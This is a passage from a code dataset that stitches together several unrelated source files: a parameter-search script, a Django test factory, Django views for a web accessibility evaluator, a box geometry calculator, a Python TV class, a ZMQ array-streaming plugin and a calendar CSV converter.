scoress[-1].copy()\n\n score_ratioss.append(np.array(scoress[-1]) / best_scores)\n mean_score_ratios.append(np.mean(score_ratioss[-1]))\n if max(mean_score_ratios) == mean_score_ratios[-1] and mean_score_ratios[-1] > 1:\n sigstr = '*'\n else:\n sigstr = ''\n logtext = logtext[:-2] + ']\\t%5.2f%s\\t(T: +%d s)\\n' % (mean_score_ratios[-1], sigstr, int(time.time() - t0))\n logtext = flush_logtext_to_file(logtext)\n if len(scoress) == 0:\n continue\n scoress = np.array(scoress)\n score_ratio = np.array(mean_score_ratios)\n imax = np.argmax(score_ratio)\n\n if score_ratio[imax] > 1:\n new_param_val = tested_param_vals[imax]\n params_curr_best[param] = new_param_val\n best_scores = np.clip(scoress[imax], 1, None) # in case score is negative or underflows\n logtext += 'Selected new value %s for param %s\\n' % (str(tested_param_vals[imax]), param)\n logtext += 'Current parameter setting:\\n\\t%s\\n' % str(params_curr_best)\n if new_param_val != old_param_val: # for edge case of first rep, first iparam\n none_changed = False\n param_steps_unchanged[param] = 0\n param_searchsteps_ptr[param] = 0\n param_val_options[param] = get_param_val_options(param, new_param_val)\n if not param_fixed_val_options[param]:\n logtext += 'New target values for param %s:\\n\\t%s\\n' % (param, param_val_options[param])\n logtext = flush_logtext_to_file(logtext)\n else:\n new_param_val = old_param_val\n logtext += 'Selected old value %s for param %s\\n' % (old_param_val, param)\n param_steps_unchanged[param] += 1\n best_exp_settings = set_param_val(param, new_param_val, best_exp_settings)\n\n if none_changed:\n advanceable_params = [param for param in target_params if not param_fixed_val_options[param]]\n if advance_in_cycle:\n considered_params = [param for param in advanceable_params if param not in recently_advanced_params]\n else:\n considered_params = advanceable_params\n steps_unchanged = [param_steps_unchanged[param] for param in considered_params]\n advanced = False\n advanced_param = None\n for advance_param in np.array(considered_params)[np.argsort(steps_unchanged)][::-1]:\n if param_stepsize_ptr[advance_param] == -1:\n if param_searchsteps_ptr[advance_param] == -1:\n continue\n else:\n param_searchsteps_ptr[advance_param] += 1\n if param_searchsteps_ptr[advance_param] == len(search_steps):\n param_searchsteps_ptr[advance_param] = -1\n advanced = True\n advanced_param = advance_param\n break\n else:\n param_stepsize_ptr[advance_param] += 1\n iparam = param_to_index[advance_param]\n if param_stepsize_ptr[advance_param] == len(param_vals_options[1][iparam][0]):\n param_stepsize_ptr[advance_param] = -1\n advanced = True\n advanced_param = advance_param\n break\n\n if not advanced:\n finished = True\n else:\n if advanced_param == 'reps':\n curr_param_val = best_exp_settings[advanced_param]\n else:\n curr_param_val = best_exp_settings['optimizer_parameters'][advanced_param]\n param_val_options[advanced_param] = get_param_val_options(advanced_param, curr_param_val)\n recently_advanced_params.add(advanced_param)\n if len(recently_advanced_params) == len(advanceable_params):\n recently_advanced_params = set()\n logtext += '\\nAdvanced optimization (param: %s)\\nCurrent target parameter step sizes:\\n\\t%s\\n' %\\\n (advanced_param, str(get_remaining_stepsizes()))\n\nflush_logtext_to_file('\\n\\nFinal parameter setting:\\n\\t%s\\n' % 
str(best_exp_settings))\n","sub_path":"tools/param_opt_with_CNN2.py","file_name":"param_opt_with_CNN2.py","file_ext":"py","file_size_in_byte":13243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"612372256","text":"import factory\n\nfrom bluebottle.rewards.models import Reward\nfrom bluebottle.test.factory_models.projects import ProjectFactory\n\n\nclass RewardFactory(factory.DjangoModelFactory):\n class Meta(object):\n model = Reward\n\n project = factory.SubFactory(ProjectFactory)\n title = factory.Sequence(lambda n: 'Reward_{0}'.format(n))\n description = factory.Sequence(lambda n: 'Just some nice reward. No {0}'.format(n))\n amount = 50\n limit = 0\n","sub_path":"bluebottle/test/factory_models/rewards.py","file_name":"rewards.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"258626531","text":"from django.template.loader import get_template\nfrom django.template import RequestContext\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.conf import settings\nfrom datetime import datetime, date, timedelta\n\nfrom project.settings import ACCT_TYPE_QUOTA, DEFAULT_QUOTA, ACCT_TYPE_BUFFER, DEFAULT_BUFFER\nfrom project.settings import STATS_DAYS_OFFSET as DAYS_OFFSET\nfrom labels import labels\nfrom models import UserProfile, UserReport, GuestReport, UsageStats\nfrom forms import BasicEvalForm, DepthEvalForm, MultiEvalForm\nfrom forms import UserForm, ProfileForm, ManageReportForm\nfrom evaluate import evaluate, multi_evaluate, evaluate_dhtml\nfrom processors import get_report_content, get_pgrpteval_content\nfrom uid import generate\n\n#----------------------------------------------------------------\ndef index(request):\n \"\"\"\n Serve the appropriate Run FAE form based on the user's login status.\n \"\"\"\n if request.user.is_authenticated():\n return index_user(request)\n else:\n return index_guest(request)\n\n#----------------------------------------------------------------\ndef index_user(request):\n\n # Create response object for saving cookie values\n response = HttpResponse()\n\n if request.method == 'POST':\n form = DepthEvalForm(request.POST)\n if form.is_valid():\n # Check that formid matches session variable\n if not check_formid(request):\n raise Http404(labels['invalid_formid'])\n params = {\n 'url': form.cleaned_data['url'],\n 'title': form.cleaned_data['title'] or labels['untitled'],\n 'depth': form.cleaned_data['depth'],\n 'span': form.cleaned_data['span'],\n 'dhtml': form.cleaned_data['dhtml'] and settings.ENABLE_DHTMLGET,\n 'username': request.user.username\n }\n now = datetime.now()\n status, uid = evaluate(params, request.user.is_authenticated(), now)\n if status:\n report = UserReport(\n id = uid,\n user = request.user,\n timestamp = now,\n pgcount = status,\n url = params['url'],\n urlcount = 1,\n depth = params['depth'],\n title = params['title'],\n dhtml = params['dhtml']\n )\n report.save()\n response = HttpResponseRedirect('/report/%s/' % uid)\n\n # Set cookie values on whichever response object we have\n response.set_cookie('d_url', value=form.cleaned_data['url'], max_age=settings.MAX_AGE)\n response.set_cookie('d_title', value=form.cleaned_data['title'], max_age=settings.MAX_AGE)\n response.set_cookie('d_depth', value=form.cleaned_data['depth'], 
max_age=settings.MAX_AGE)\n response.set_cookie('d_span', value=form.cleaned_data['span'], max_age=settings.MAX_AGE)\n if form.cleaned_data['dhtml']:\n response.set_cookie('d_dhtml', value=form.cleaned_data['dhtml'], max_age=settings.MAX_AGE)\n else:\n response.delete_cookie('d_dhtml')\n\n if status:\n return response\n else:\n return message(request, response, 'Unable to create report!')\n\n else:\n init_values = {}\n if 'd_url' in request.COOKIES:\n init_values['url'] = request.COOKIES['d_url']\n if 'd_title' in request.COOKIES:\n init_values['title'] = request.COOKIES['d_title']\n if 'd_depth' in request.COOKIES:\n init_values['depth'] = request.COOKIES['d_depth']\n if 'd_span' in request.COOKIES:\n init_values['span'] = request.COOKIES['d_span']\n if 'd_dhtml' in request.COOKIES:\n init_values['dhtml'] = request.COOKIES['d_dhtml']\n form = DepthEvalForm(initial=init_values)\n\n context = {\n 'page_type': 'index',\n 'title': labels['index'],\n 'formid': store_formid(request),\n 'form': form,\n }\n\n # Return response\n t = get_template('index_user.html')\n html = t.render(RequestContext(request, context))\n response.write(html)\n return response\n\n#----------------------------------------------------------------\ndef index_guest(request):\n\n # Create response object for saving cookie values\n response = HttpResponse()\n\n if request.method == 'POST':\n form = BasicEvalForm(request.POST)\n if form.is_valid():\n # Check that formid matches session variable\n if not check_formid(request):\n raise Http404(labels['invalid_formid'])\n params = {\n 'url': form.cleaned_data['url'],\n 'title': labels['untitled'],\n 'dhtml': form.cleaned_data['dhtml'] and settings.ENABLE_DHTMLGET,\n 'username': 'guest'\n }\n now = datetime.now()\n status, uid = evaluate(params, False, now)\n if status:\n report = GuestReport(\n id = uid,\n timestamp = now,\n pgcount = status,\n url = params['url'],\n dhtml = params['dhtml']\n )\n report.save()\n response = HttpResponseRedirect('/report/%s/' % uid)\n\n response.set_cookie('b_url', value=form.cleaned_data['url'], max_age=settings.MAX_AGE)\n if form.cleaned_data['dhtml']:\n response.set_cookie('b_dhtml', value=form.cleaned_data['dhtml'], max_age=settings.MAX_AGE)\n else:\n response.delete_cookie('b_dhtml')\n\n if status:\n return response\n else:\n return message(request, response, 'Unable to create report!')\n else:\n init_values = {}\n if 'b_url' in request.COOKIES:\n init_values['url'] = request.COOKIES['b_url']\n if 'b_dhtml' in request.COOKIES:\n init_values['dhtml'] = request.COOKIES['b_dhtml']\n form = BasicEvalForm(initial=init_values)\n\n context = {\n 'page_type': 'index',\n 'title': labels['index'],\n 'formid': store_formid(request),\n 'form': form,\n }\n\n # Return response\n t = get_template('index_guest.html')\n html = t.render(RequestContext(request, context))\n response.write(html)\n return response\n\n#----------------------------------------------------------------\n@login_required\ndef index_multi(request):\n\n # Create response object for saving cookie values\n response = HttpResponse()\n\n if request.method == 'POST':\n form = MultiEvalForm(request.POST)\n if form.is_valid():\n # Check that formid matches session variable\n if not check_formid(request):\n raise Http404(labels['invalid_formid'])\n params = {\n 'urls': form.cleaned_data['urls'],\n 'title': form.cleaned_data['title'] or labels['untitled'],\n 'dhtml': form.cleaned_data['dhtml'] and settings.ENABLE_DHTMLGET,\n 'username': request.user.username\n }\n now = datetime.now()\n status, 
uid = multi_evaluate(params, request.user.is_authenticated(), now)\n\n if status:\n urls = form.cleaned_data['urls'].split()\n report = UserReport(\n id = uid,\n user = request.user,\n timestamp = now,\n pgcount = status,\n url = urls[0],\n urlcount = len(urls),\n depth = 0,\n title = params['title'],\n dhtml = params['dhtml']\n )\n report.save()\n response = HttpResponseRedirect('/report/%s/' % uid)\n\n response.set_cookie('m_urls', value=form.cleaned_data['urls'], max_age=settings.MAX_AGE)\n response.set_cookie('m_title', value=form.cleaned_data['title'], max_age=settings.MAX_AGE)\n if form.cleaned_data['dhtml']:\n response.set_cookie('m_dhtml', value=form.cleaned_data['dhtml'], max_age=settings.MAX_AGE)\n else:\n response.delete_cookie('m_dhtml')\n\n if status:\n return response\n else:\n return message(request, response, 'Unable to create report!')\n else:\n init_values = {}\n if 'm_urls' in request.COOKIES:\n init_values['urls'] = request.COOKIES['m_urls']\n if 'm_title' in request.COOKIES:\n init_values['title'] = request.COOKIES['m_title']\n if 'm_dhtml' in request.COOKIES:\n init_values['dhtml'] = request.COOKIES['m_dhtml']\n form = MultiEvalForm(initial=init_values)\n\n context = {\n 'page_type': 'index',\n 'title': labels['multi'],\n 'formid': store_formid(request),\n 'form': form,\n }\n\n # Return response\n t = get_template('index_multi.html')\n html = t.render(RequestContext(request, context))\n response.write(html)\n return response\n\n#----------------------------------------------------------------\ndef process_dhtml(request):\n \"\"\"\n Evaluate one or more DHTML DOM snapshots sent as POST data.\n \"\"\"\n if not request.method == 'POST':\n raise Http404('Unable to process DHTML data!')\n\n if 'doc1' in request.POST and len(request.POST['doc1']):\n params = {\n 'request': request,\n 'url': 'Unspecified',\n 'depth': '0',\n 'title': 'DHTML Report',\n 'dhtml': settings.ENABLE_DHTMLGET,\n 'username': request.user.username\n }\n now = datetime.now()\n status, uid = evaluate_dhtml(params, request.user.is_authenticated(), now)\n if status:\n if request.user.is_authenticated():\n report = UserReport(\n id = uid,\n user = request.user,\n timestamp = now,\n pgcount = status,\n url = params['url'],\n urlcount = 1,\n depth = params['depth'],\n title = params['title'],\n dhtml = params['dhtml']\n )\n else:\n report = GuestReport(\n id = uid,\n timestamp = now,\n pgcount = status,\n url = params['url'],\n dhtml = params['dhtml']\n )\n report.save()\n return HttpResponseRedirect('/report/%s/' % uid)\n else:\n return message(request, HttpResponse(), 'Unable to create report!')\n\n else:\n return message(request, HttpResponse(), 'No DHTML data detected!')\n \n#----------------------------------------------------------------\ndef process_link(request):\n \"\"\"\n Evaluate referrer page with direct link to FAE.\n \"\"\"\n if 'HTTP_REFERER' in request.META and len(request.META['HTTP_REFERER']):\n params = {\n 'url': request.META['HTTP_REFERER'],\n 'depth': '0',\n 'title': 'Direct Link Report',\n 'dhtml': settings.ENABLE_DHTMLGET,\n 'username': 'guest'\n }\n now = datetime.now()\n status, uid = evaluate(params, False, now)\n if status:\n report = GuestReport(\n id = uid,\n timestamp = now,\n pgcount = status,\n url = params['url'],\n dhtml = params['dhtml']\n )\n report.save()\n return HttpResponseRedirect('/report/%s/' % uid)\n else:\n return message(request, response, 'Unable to create report!')\n\n else:\n return message(request, HttpResponse(), 'No HTTP_REFERER 
detected!')\n\n#----------------------------------------------------------------\ndef check_formid(request):\n return request.POST['formid'] == request.session.get('formid')\n\n#----------------------------------------------------------------\ndef store_formid(request):\n formid = generate()\n request.session['formid'] = formid\n return formid\n\n#----------------------------------------------------------------\ndef message(request, response, text):\n \"\"\"\n Return the response, which may have cookie data associated\n with it, using the message template.\n \"\"\"\n t = get_template('message.html')\n context = {'page_type': 'message', 'title': text}\n html = t.render(RequestContext(request, context))\n response.write(html)\n return response\n\n#----------------------------------------------------------------\ndef registration_closed(request):\n \"\"\"\n Return the response using the specified template.\n \"\"\"\n t = get_template('registration/registration_closed.html')\n context = { 'installation': settings.INSTALLATION, 'public_url': settings.PUBLIC_URL }\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n\n#----------------------------------------------------------------\n@login_required\ndef archived_reports(request):\n \"\"\"\n Display a list of the user's currently archived reports.\n \"\"\"\n report_list = UserReport.objects.filter(user=request.user)\n context = {\n 'page_type': 'archive',\n 'title': labels['archive'],\n 'username': request.user.username,\n 'report_list': report_list\n }\n\n # For highlighting currently selected report in list\n report_info = request.session.get('report', {})\n if report_info: context['current_id'] = report_info['rptid']\n\n # Return response\n t = get_template('archive.html')\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n\n#----------------------------------------------------------------\n@login_required\ndef manage_reports(request):\n \"\"\"\n Allow user to select which reports should be archived.\n \"\"\"\n report_list = UserReport.objects.filter(user=request.user)\n status = ''\n num_archive = 0\n for report in report_list:\n if report.archive:\n num_archive += 1\n\n try:\n profile = request.user.get_profile()\n quota = ACCT_TYPE_QUOTA[profile.acct_type]\n buffer = ACCT_TYPE_BUFFER[profile.acct_type]\n except ObjectDoesNotExist:\n quota = DEFAULT_QUOTA\n buffer = DEFAULT_BUFFER\n\n if request.method == 'POST':\n archive_info = []; i = 0\n for report in report_list:\n archive_info.append((report, ManageReportForm(request.POST, prefix=str(i), instance=report)))\n i += 1\n # validate based on number of selected reports\n count = len(request.POST)\n if count <= quota:\n for (report, form) in archive_info:\n form.save()\n status = 'Selection of permanently archived reports has been updated!'\n num_archive = count\n else:\n return message(request, HttpResponse(), 'Number of selected reports exceeds quota!')\n \n else:\n archive_info = []; i = 0\n for report in report_list:\n archive_info.append((report, ManageReportForm(prefix=str(i), instance=report)))\n i += 1\n\n context = {\n 'page_type': 'manage',\n 'title': labels['manage'],\n 'username': request.user.username,\n 'archive_info': archive_info,\n 'report_list': report_list,\n 'quota': quota,\n 'buffer': buffer,\n 'days_offset' : DAYS_OFFSET,\n 'num_archive' : num_archive,\n 'status': status,\n }\n\n # For highlighting currently selected report in list\n report_info = request.session.get('report', {})\n if report_info: 
context['current_id'] = report_info['rptid']\n\n # Return response\n t = get_template('manage.html')\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n\n#----------------------------------------------------------------\ndef page_report(request, rptid, type, pageid=None, section=None):\n \"\"\"\n Call the report function, but allow a different ordering of arguments.\n \"\"\"\n return report(request, rptid, type, section, pageid)\n\n#----------------------------------------------------------------\ndef report(request, rptid, type=None, section=None, pageid=None):\n \"\"\"\n Serve the requested report, with defaults for type, section and pageid\n when none are specified.\n \"\"\"\n # Set default values\n default_type = 'summary'\n default_section = 'nav'\n default_pageid = '1'\n\n # Get latest report parameters if they exist\n report_info = get_report_info(request, rptid)\n\n # If report_info doesn't exist, return error message\n if not report_info:\n return message(request, HttpResponse(), 'Report ID does not exist!')\n\n if type:\n report_info['type'] = type\n else:\n if not 'type' in report_info:\n report_info['type'] = default_type\n\n if section:\n report_info['section'] = section\n else:\n if not 'section' in report_info:\n report_info['section'] = default_section\n\n if pageid:\n report_info['pageid'] = pageid\n else:\n if not 'pageid' in report_info:\n report_info['pageid'] = default_pageid\n\n # Store report parameters in session variable\n request.session['report'] = report_info\n\n # If we're exporting data as XML, we do that here...\n if report_info['type'] == 'xml':\n export_filename = 'fae-' + rptid + '.xml'\n content = get_report_content(report_info, '')\n response = HttpResponse(content, mimetype='text/xml')\n response['Content-Disposition'] = 'attachment; filename=%s' % export_filename\n return response\n\n # Construct the document title\n title = labels['report'][report_info['type']]\n if report_info['type'] == 'page' and report_info['pgcount'] != '1':\n title += ': ' + report_info['pageid']\n\n # Save report_header at this point for get_report_content\n report_header = title\n if report_info['type'] == 'sitewide' or report_info['type'] == 'page':\n title += ': ' + labels['section'][report_info['section']]\n\n # Select the report template\n if report_info['type'] == 'sitewide':\n template_name = 'site_report.html'\n else:\n template_name = 'report.html'\n\n # Set up context\n context = {\n 'page_type': 'report',\n 'title': title,\n 'content': get_report_content(report_info, report_header)\n }\n if report_info['type'] == 'sitewide' or report_info['type'] == 'page':\n context['display_sections'] = True\n\n # If results data was not found, return error message\n if not context['content']:\n return message(request, HttpResponse(), 'Report data does not exist!')\n\n # Return response\n t = get_template(template_name)\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n\n#----------------------------------------------------------------\ndef pgrpteval(request):\n if request.is_ajax():\n report_info = request.session.get('report', {})\n testid = request.GET.get('testid', '')\n eval = request.GET.get('eval', '')\n content = get_pgrpteval_content(report_info, testid, eval)\n else:\n content = 'None'\n return HttpResponse(content) \n\n#----------------------------------------------------------------\ndef about(request, content_id='overview'):\n title = labels['about'] + ': ' + labels['subtitle'][content_id]\n content = 
'about/' + content_id + '.html'\n\n context = {\n 'page_type': 'about',\n 'title': title,\n 'subtitle': labels['subtitle'],\n 'content': content,\n }\n\n if content_id == 'usage':\n today = date.today()\n one_week_ago = today - timedelta(days=8) # account for lag in collecting stats\n span = request.GET.get('span', '')\n\n if span == 'thismonth':\n stats = UsageStats.objects.filter(date__month=today.month, date__year=today.year)\n elif span == 'lastmonth':\n if today.month == 1:\n month, year = 12, today.year - 1\n else:\n month, year = today.month - 1, today.year\n stats = UsageStats.objects.filter(date__month=month, date__year=year)\n elif span == 'thisyear':\n stats = UsageStats.objects.filter(date__year=today.year)\n elif span == 'all':\n stats = UsageStats.objects.all()\n else: # Default to last seven days\n span = 'default'\n stats = UsageStats.objects.filter(date__gte=one_week_ago, date__lte=today)\n context['stats'] = stats\n context['caption'] = labels['stats'][span]\n\n # Aggregate totals for reports and pgcount fields\n user_reports = 0; user_pgcount = 0; guest_reports = 0; guest_pgcount = 0\n for record in stats:\n user_reports += record.user_reports\n user_pgcount += record.user_pgcount\n guest_reports += record.guest_reports\n guest_pgcount += record.guest_pgcount\n context['user_reports'] = user_reports\n context['user_pgcount'] = user_pgcount\n context['guest_reports'] = guest_reports\n context['guest_pgcount'] = guest_pgcount\n\n # Return response\n t = get_template('about/about.html')\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n\n#----------------------------------------------------------------\ndef get_report_info(request, rptid):\n \"\"\"\n Given a report ID:\n IF rptid matches existing report_info\n return existing report_info\n ELSE\n lookup report by rptid in database\n IF found\n return a new dictionary with rptid\n and pgcount keys/values\n ELSE\n return an empty dictionary to flag\n that report does not exist\n \"\"\"\n # Get latest report parameters if they exist\n report_info = request.session.get('report', {})\n\n if request.user.is_authenticated():\n primary = UserReport\n secondary = GuestReport\n else:\n primary = GuestReport\n secondary = UserReport\n\n if 'rptid' in report_info and report_info['rptid'] == rptid:\n return report_info\n else:\n try:\n report = primary.objects.get(id=rptid)\n except ObjectDoesNotExist:\n try:\n report = secondary.objects.get(id=rptid)\n except ObjectDoesNotExist:\n return {}\n\n return { 'rptid': rptid,\n 'pgcount': str(report.pgcount),\n 'filename': report.get_filename()\n }\n\n#----------------------------------------------------------------\ndef logout(request):\n from django.contrib.auth.views import logout\n return logout(request, next_page='/')\n\n#----------------------------------------------------------------\ndef get_profile_data(profile_obj):\n \"\"\"\n Given a user profile object, returns a dictionary representing\n its fields, suitable for passing as the initial data of a form.\n This fn. 
courtesy of James Bennett's broken profiles package.\n \"\"\"\n opts = profile_obj._meta\n data_dict = {}\n for f in opts.fields + opts.many_to_many:\n data_dict[f.name] = f.value_from_object(profile_obj)\n return data_dict\n\n#----------------------------------------------------------------\n@login_required\ndef my_account(request):\n user_data = {\n 'first_name': request.user.first_name,\n 'last_name': request.user.last_name,\n 'email': request.user.email\n }\n\n try:\n profile_obj = request.user.get_profile()\n except ObjectDoesNotExist:\n profile_obj = UserProfile(user=request.user, acct_type=1)\n\n if request.method == 'POST':\n user_form = UserForm(request.POST, instance=request.user)\n profile_form = ProfileForm(request.POST, instance=profile_obj)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n return HttpResponseRedirect('/')\n else:\n user_form = UserForm(initial=user_data)\n profile_form = ProfileForm(initial=get_profile_data(profile_obj))\n\n context = {\n 'title': labels['profile'],\n 'username': request.user.username,\n 'user_form': user_form,\n 'profile_form': profile_form,\n }\n\n # Return response\n t = get_template('my_account.html')\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n","sub_path":"fae/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"351972666","text":"def getAttributes():\n return [\"panjang\", \"lebar\", \"tinggi\"]\n\ndef getVolume(p, l, t):\n volume = p * l * t\n return volume\n\ndef getLuasPermukaan(p, l, t):\n Lp1 = 2 * p * l\n Lp2 = 2 * l * t\n Lp3 = 2 * t * p\n luasPermukaan = Lp1 + Lp2 + Lp3\n return luasPermukaan\n\ndef getHasil(p, l, t):\n hasil = \"Volume Balok = \" + str(getVolume(p, l, t)) + \"\\n\" + \"Luas Permukaan Balok = \" + str(getLuasPermukaan(p, l, t))\n return hasil\n\ndef checkError(inputUsers, nama, value) :\n if nama == \"panjang\" :\n if value <= 0 :\n return nama + \" tidak boleh kurang dari atau sama dengan 0\"\n else :\n return True\n elif nama == \"lebar\" :\n if value <= 0 :\n return nama + \" tidak boleh kurang dari atau sama dengan 0\"\n else : \n return True\n\n elif nama == \"tinggi\" :\n if value <= 0 :\n return nama + \" tidak boleh kurang dari atau sama dengan 0\"\n else : \n return True","sub_path":"Dimensi3/balok.py","file_name":"balok.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"165342676","text":"class TV:\r\n def __init__(self, channel=1, volume=0):\r\n self.channel = channel\r\n self.volume = volume\r\n print(\"Telewizor włączony\")\r\n\r\n\r\n def __str__(self):\r\n return f\"Aktualny kanał: {self.channel} Stan głośności: {self.volume}\"\r\n\r\n def change_channel(self):\r\n value = int(input(\"Wybierz kanał: \"))\r\n self.channel = value\r\n def change_valoume(self):\r\n value = int(input(\"Wybierz poziom głośności: \"))\r\n self.volume = value\r\n\r\n @property\r\n def channel(self):\r\n return self._channel\r\n @channel.setter\r\n def channel(self, value):\r\n while True:\r\n try:\r\n int(value)\r\n except ValueError:\r\n value = int(input(\"Kanał określany jest literami \"))\r\n else:\r\n if 0 < value > 36:\r\n value = int(input(\"Kanał nie musi być z zakresu [1:35] \"))\r\n else:\r\n self._channel = value\r\n break\r\n @property\r\n def volume(self):\r\n return self._volume\r\n @volume.setter\r\n 
def volume(self, value):\r\n while True:\r\n try:\r\n int(value)\r\n except ValueError:\r\n value = int(input(\"Głośność nie jest określana literami \"))\r\n else:\r\n if 0 <= value > 11:\r\n value = int(input(\"Głośność musi być z zakresu [0:10] \"))\r\n else:\r\n self._volume = value\r\n break\r\n\r\n\r\n\r\n","sub_path":"lab1/ex5/tv.py","file_name":"tv.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"378775966","text":"#!/usr/bin/env dls-python\nfrom adPythonPlugin import AdPythonPlugin\nimport numpy\nimport sys\nimport logging\nimport time\n\nfrom pkg_resources import require\nrequire('pyzmq')\nrequire('msgpack-python')\nimport zmq\n\nimport blosc\nimport msgpack\n\nclass Transfer(AdPythonPlugin):\n\n def __init__(self):\n self.log.setLevel(logging.DEBUG)\n params = dict(tcpport = 34567, num_clients=0, level=6, ratio=0.0)\n AdPythonPlugin.__init__(self, params)\n \n self.zmq_context = zmq.Context()\n self.zmq_socket = self.zmq_context.socket(zmq.PUB)\n self.zmq_socket.bind(\"tcp://*:%d\"%self['tcpport'])\n self.log.debug(\"HWM: %d\", self.zmq_socket.get_hwm())\n self.zmq_socket.set_hwm(2)\n \n def paramChanged(self):\n pass\n \n def processArray(self, arr, attr):\n self.log.debug('packing array with shape: %s', str(arr.shape))\n \n # Pack a description of the array dimensions and datatype into a packet\n msg_array_desc = msgpack.packb({'dtype': str(arr.dtype), 'shape': arr.shape})\n\n # Compress the data from the array without making a copy (i.e. by passing a read-only\n # pointer to the blosc library.\n arr_ptr = arr.__array_interface__['data'][0]\n msg_array = blosc.compress_ptr(arr_ptr, arr.size, arr.dtype.itemsize, self['level'], True)\n # Calculate the resulting compression ratio\n self['ratio'] = float(len(msg_array)) / float(arr.nbytes)\n self.log.debug(\"Compressed ratio: %d/%d %.3f\", arr.nbytes, len(msg_array), self['ratio'])\n\n # Pack the NDAttribute dictionary into a packet\n self.log.debug('packing attributes')\n msg_attr = msgpack.packb(attr)\n self.log.debug(' result dict length: %d', len(msg_attr))\n \n # Send the packets in a multipart zmq message.\n self.log.debug('sending multipart message')\n tracker = self.zmq_socket.send_multipart([msg_array_desc, msg_array, msg_attr], copy=False, track=True)\n \n # Wait for ZMQ to report that it has completed. 
We can possibly ignore this step - but then we would be\n # relying on the ZMQ buffering rather than our areaDetector buffers - and that is much less configurable.\n #self.log.debug('waiting for send to complete')\n #try:\n # tracker.wait(1.0)\n #except zmq.NotDone:\n # self.log.exception('Timeout when waiting to complete transfer: %s', str(zmq.NotDone))\n \n # All done, ready for new frame!\n self.log.debug('Processing done!')\n return None\n \nif __name__==\"__main__\":\n Focus().runOffline()\n","sub_path":"adPythonApp/scripts/adPythonTransfer.py","file_name":"adPythonTransfer.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"83464496","text":"__author__ = 'blueteeth'\n\nimport csv\nimport sys\nfrom datetime import datetime, timedelta\n\n'''\n\tGoogle Calendar format:\n\t\tSubject,Start Date,Start Time,End Date,End Time,All Day Event,Description,Location,Private\n\t\n\tSoton Calendar format:\n\t\tDay,StartTime,EndTime,Module,Lecturer,Location,Weeks\n\t\t\n\tUSAGE: python calendar-converter.py [input.csv] [output.csv]\n'''\n\nclass CalendarConverter:\n\t\n\tday_offset = {\n\t\t\"Monday\" \t: 0,\n\t\t\"Tuesday\"\t: 1,\n\t\t\"Wednesday\" : 2,\n\t\t\"Thursday\"\t: 3,\n\t\t\"Friday\"\t: 4,\n\t\t\"Saturday\"\t: 5,\n\t\t\"Sunday\"\t: 6\n\t}\n\t\n\tdef __init__(self, infile, outfile, first_term_day):\n\t\tinfile = open(infile)\n\t\toutfile = open(outfile, 'wb')\n\t\tself.reader = csv.reader(infile)\n\t\tself.writer = csv.writer(outfile, lineterminator='\\n')\n\t\tself.first_term_day = first_term_day\n\t\t\n\t\tself.has_header = False # if the output file yet has the header information\n\t\n\tdef __exit__(self):\n\t\t# when done close files\n\t\tinfile.close()\n\t\toutfile.close()\n\t\t\n\tdef add_entry(self, line_data, week_number):\n\t\t\n\t\t# day of the week\n\t\tday = line_data[0]\n\t\t\n\t\t# start time\n\t\tstart_time = line_data[1]\n\t\t\n\t\t# end time\n\t\tend_time = line_data[2]\n\t\t\n\t\t# module\n\t\tmodule = line_data[3]\n\t\t\n\t\t# lecturers\n\t\tlecturer = line_data[4]\n\t\t\n\t\t# location\n\t\tlocation = line_data[5]\n\t\t\n\t\t# ------------------------ #\n\t\t# Google Calendar Headings #\n\t\t# ------------------------ #\n\t\t\n\t\t# subject 'COMP1202 - 58/1067'\n\t\tsubject = '%s - %s' % (module, location)\n\t\t\n\t\t# date is the first day of term + day of the week + number of weeks since term start\n\t\tstart_date = self.first_term_day + timedelta(days=CalendarConverter.day_offset[day], weeks=week_number-1) \n\t\t# end date is the same as start date\n\t\t\n\t\tstart_date_string = start_date.strftime(\"%Y/%m/%d\")\n\t\t\n\t\t# description \n\t\t# lecturer field contains commas, so must be surrounded by '\"'\n\t\tdescription = '\"%s - %s - %s\"' % (lecturer, location, line_data[6])\n\t\t\n\t\t\n\t\tgcalendar_headers = [\n\t\t\t\"Subject\",\n\t\t\t\"Start Date\",\n\t\t\t\"Start Time\",\n\t\t\t\"End Date\",\n\t\t\t\"End Time\",\n\t\t\t\"All Day Event\",\n\t\t\t\"Description\",\n\t\t\t\"Location\",\n\t\t\t\"Private\"\n\t\t]\n\t\t\n\t\t# ----------- #\n\t\t# CSV WRITING #\n\t\t# ----------- #\n\t\t\n\t\tif not self.has_header:\n\t\t\tself.writer.writerow(gcalendar_headers)\n\t\t\tself.has_header = True\n\t\t\n\t\tgcalendar_line = [\n\t\t\tsubject,\n\t\t\tstart_date_string,\n\t\t\tstart_time,\n\t\t\tstart_date_string,\n\t\t\tend_time,\n\t\t\tFalse,\n\t\t\tdescription,\n\t\t\tlocation,\n\t\t\tFalse\n\t\t]\n\t\t\n\t\tself.writer.writerow(gcalendar_line)\n\t\t\n\t\n\tdef 
